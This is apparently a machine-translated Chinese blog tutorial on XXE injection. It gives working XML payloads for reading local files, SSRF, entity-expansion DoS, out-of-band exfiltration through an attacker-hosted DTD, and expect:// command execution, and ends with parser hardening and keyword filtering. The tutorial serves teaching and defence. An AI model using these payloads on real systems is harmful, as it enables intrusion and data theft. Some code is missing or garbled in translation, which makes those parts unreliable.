safe customer, safe information platform

Posted by barello at 2020-03-08

Author: King Jiyue

Estimated contribution fee: 400RMB

Submission method: send an email to Linwei Chen, or log in to the web page for online submission

Have you ever heard of an XML injection attack, or do you know one thing or the other?

Now let's start with the basic knowledge of XML, step by step to understand the principles and methods of XML attacks.

This article is mainly aimed at literacy. Please spray lightly. If you have any mistakes, please point out.

XML is designed to transmit and store data, and its focus is the content of data.

Html is designed to display data, with the focus on the appearance of the data.

XML separates data from HTML.

XML is a software and hardware independent information transmission tool.

<bookstore> <!--根元素--> <book category="COOKING"> <!--bookstore的子元素,category为属性--> <title>Everyday Italian</title>      <!--book的子元素,lang为属性--> <author>Giada De Laurentiis</author>       <!--book的子元素--> <year>2005</year> <!--book的子元素--> <price>30.00</price> <!--book的子元素--> </book> <!--book的结束--> </bookstore> <!--bookstore的结束-->

In XML, some characters have special meanings. To avoid this error, use entity references instead of special characters

Schedule 1

Note to table 1: in XML, only the characters "< and" & "are indeed illegal. The greater than sign is legal, but it's a good practice to replace it with an entity reference.

Legal XML documents are "well formed" XML documents, which also follow the syntax rules of document type definition (DTD).

DTD introduction

Document type definition (DTD) can define legal XML document building module. It uses a set of legal elements to define the structure of the document.

DTD can be declared in lines in an XML document or as an external reference.

XML document instance with DTD

<?xml version="1.0"?> <!DOCTYPE note [<!--定义此文档是 note 类型的文档--> <!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素--> <!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型--> <!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型--> <!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型--> <!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型--> ]> <note> <to>Dave</to> <from>Tom</from> <head>Reminder</head> <body>You are a good man</body> </note>


Source code

When the DTD is located outside the XML source file, it is encapsulated in a DOCTYPE definition through the following syntax

<!DOCTYPE root-element SYSTEM "filename">

External DTD instance

<?xml version="1.0"?> <!DOCTYPE note SYSTEM "note.dtd"><!--申明语句--> <note>   <to>Dave</to>   <from>Tom</from>   <heading>Reminder</heading>   <body>You are a good man</body> </note>

"Note. DTD" file

<!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素--> <!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型--> <!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型--> <!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型--> <!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->


Source code

DTD file

PCDATA means the parsed character data. PCDATA is the text that will be parsed by the parser. The text will be examined by the parser for entities and tags. Labels in text are treated as tags, and entities are expanded. However, the parsed character data should not contain any &, < or > characters; they need to be replaced with & amp;, & lt; and & gt; entities, respectively.

CDATA means character data. CDATA is text that will not be parsed by the parser. Tags in these texts are not treated as tags, and the entities in them are not expanded.

DTD element

Note: because it is only an extension, it only shows some common element syntax

DTD - properties

Property declarations use the following syntax:

<!ATTLIST 元素名称 属性名称 属性类型 默认值>

DTD example:

<!ATTLIST payment type CDATA "check">

XML example:

<payment type="check" />

The following are options for property types:

The default value parameter can use the following values:

DTD – entity (important)

Entities are variables that define shortcuts that reference plain text or special characters.

An entity reference is a reference to an entity.

Entities can be declared internally or externally.

Introduction to schema (XSD)

XML schema is the substitute of DTD based on XML.

XML schema describes the structure of an XML document.

The XML Schema language can also be referenced as an XSD (XML Schema Definition)

But at present, XSD's xxE attack on this article is not too relevant. If you want to know more about it, you can go to or to learn

Attack routine

General skills:

1. Remote file reading by referencing external entities

2. URL request (through which SSRF can be initiated)

3. Parameter entity

4. Include external resources through xinclude


1. External entity reference

Remote file content can be obtained through external entity reference

Local experiment:

The content in the test.txt file is 123admin

But there is a problem. If the content format of the file is too complex, XML parsing will fail (for example, the content contains spaces, some special characters < > &; and so on)

In fact, there are bypass methods. As mentioned above, parameter entities can be used. The specific content will be introduced later

Another method we know is to use PHP pseudo protocol, PHP: / / filter to read the contents of the file (the contents of the file are all characters after the base64 filter, without format interference)

2. URL request (SSRF)

A request can be initiated directly by using an external entity reference, because many XML parsers force the request when they read the module that references the external file

Local experiment:

First, listen to port 1231 at

Using XML to make request at (just put XML into browser)

As shown in the figure above, the browser has been loading content because there is no information returned on the 153 machine

1231 port status of

This SSRF can be noted, because in most attacks on XML, external entity references are used. What about forbidding external entity references when loading xml directly?

In this case, most attacks will fail, but SSRF will not

Don't forget that there is another way to request external resources. Use DOCTYPE directly

3. DoS

Any method that can occupy a large amount of server resources can cause DOS. The principle is recursive reference

The lol entity also has the "lol" string, and then a lol2 entity references a lol entity 10 times, a lol3 entity references a lol2 entity 10 times, at this time a lol3 entity contains 10 ^ 2 "lols", and so on, a lol9 entity contains 10 ^ 8 "lol" strings

So, reference lol9, boom

4. Parameter entity

Parameter entity. In the previous introduction of remote file reading, it can bypass the limitation of parsing failure caused by the complexity of file content

Parameter entities start with% we only need to follow two principles when using parameter entities:

1. Parameter entities can only be used in DTD declarations. 2. Parameter entities can no longer be referenced in parameter entities.

As shown in the figure, / etc / fstab is a file with complex content. If you directly use system to request a remote file, you will make an error in parsing, that is, you cannot read the file content.

Then you can use parameter entities to bypass XML's strict syntax rules

In fact, the process is very simple:

Content of start parameter entity: <! [CDATA[

Contents of the goodies parameter entity: File: / / / etc / fastab (use the file protocol to read the file)

End parameter entity content:]] >

Then a DTD parameter entity is defined, and the system is used to issue to obtain the content of combine.dtd

The DTD parameter entity is referenced in the DTD. At this time, the DTD in the source file should be as follows:

<!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///etc/fstab"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM ""> <!ENTITY all "%start;%goodies;%end;">

Finally, the source file references all common entities to cause file reading:

<roottag><! [CDATA["/etc/fstab文件的内容"]]></roottag>

This CDATA means to add attributes to the file content: ordinary characters that are not parsed

In this way, the reference of parameter entity does not need to keep the XML closed when parsing the XML document, and the XML interpreter will directly ignore the syntax rules of the file content, achieving the purpose of bypassing

Attacker IP: eval.dtd 1.php

Server IP 2.php

There is a file called eval.dtd in the attacker's web directory for attack, then upload 2.php to the server and execute 2.php

It doesn't matter if you make a mistake.

Here's the code:


Simply accept the content passed by the get parameter and save it in 1.txt

The content of eval.dtd file is

Note here that when using parameter entity, it needs to use & ා X25 instead of% in the format of reference entity. Because nested reference external parameter entity, if directly used%, the parameter entity name will not be found during reference

The function is to apply the accepted external file entity to the% file of 1. PHP? File =

In this way, the content uploaded from the server will be transferred to the file parameter and saved to 1.txt

In the 2.php file

The first entity is used to read the server local file test.txt

Second for referencing remote DTD files

Secondly, we need to pay attention to the order of entity utilization. First, execute the code named DTD entity reference attacker eval.dtd to obtain the execution method of entity send: File =% file;

Then reference the content obtained by the file entity to File

At this point, the attacker server saves 1.txt

As mentioned earlier, when there are spaces and angle brackets in reading files, this way of directly reading content will report an error

Display the invalid URL. You can't catch the package accessing File = blending software on the browser

Combined with the previous protocol application, you can use the common PHP: / / filter to read Base64 encoding

as follows

Just decode.

Just a few protocols are selected as examples. All protocols here can be used.

Here are some English documents and examples about the xxE vulnerability: 

Http:// - Z-blog arbitrary file read

5. Include external resources through xinclude

Xinclude based file contains another set of XML syntax constraints: XML schema

Xinclude provides a more convenient way to retrieve data (no need to worry about data incompleteness and cause the parser to throw an error) and we can force reference to the file type through the parse attribute.

<root xmlns:xi="">  <xi:include href="file:///etc/fstab" parse="text"/> </root>

However, xinclude needs to be turned on manually, and all XML parsers are turned off by default.

PHP and Java environment

Extension protocol supported by PHP


The default XML parser Under Oracle's Java runtime environment is Xerces, an Apache project. Xerces and Java provide a series of features, which can lead to some serious security problems. The above attack techniques (DOCTYPES for SSRF, file reading, and data out of parameter entities) can be used freely under the default configuration of Java. Java / Xerces also supports xinclude, but it needs setxincludeaware (true) and setnamespaceaware (true).

Rce of PHP & expect

Unfortunately, this extension is not installed by default. However, the xxE vulnerability of this extension can execute arbitrary commands.

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> <dir> <file>&cmd;</file> </dir>

There are also python,. Net environment, etc


1. Directly use the method provided by the development language to disable external entities

In fact, it can't defend the SSRF made by XML




DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2 filter XML data submitted by users

Sensitive Keywords: <! DOCTYPE, <! Entity, system, public


XML attacks are mostly caused by external resource requests from parsers, and some protocol features can easily bypass XML format requirements. The main keywords are DOCTYPE (DTD declaration), entity (entity declaration), system, public (external resource request).

Various routines are triggered by flexible references to common entities and parameter entities

Source of data